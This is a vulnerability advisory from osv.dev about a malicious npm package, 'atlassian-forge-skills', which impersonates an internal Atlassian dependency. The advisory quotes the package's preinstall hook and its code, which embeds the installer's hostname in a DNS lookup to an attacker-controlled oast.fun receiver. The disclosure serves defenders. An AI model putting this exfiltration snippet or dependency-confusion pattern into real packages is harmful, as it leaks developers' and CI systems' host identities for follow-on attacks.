atlassian-forge-skills @29.1.0
Vulnerability report · Last retrieved from osv.dev June 23, 2026 at 4:30 AM UTC
OSV ID
MAL-2026-5891
Ecosystem
npm
Summary
Package impersonates an internal Atlassian Forge dependency (unscoped name 'atlassian-forge-skills', description 'Internal package', generic author 'Team'). package.json declares "preinstall": "node index.js", which runs automatically on 'npm install'. index.js lines 6-8 read os.hostname() and embed it as a subdomain of a hardcoded interactsh OAST receiver: const targetDomain = `${hostname}.zcagyqqmvnmgsklstrrr6xo2715tov7wz.oast.fun`; dns.lookup(targetDomain, () => {});. The DNS lookup alone is enough to leak the installer's hostname to the attacker-controlled oast.fun DNS server, even if no connection is completed. This is the canonical dependency-confusion payload: any developer or CI pipeline that mistakenly resolves an internal Atlassian package name to this public registry entry exposes host identity for follow-on targeting.
Source: amazon-inspector (0ca0f4b99cda621977551550ed678ad77ee82827714acb9d08534f53b0642e3c)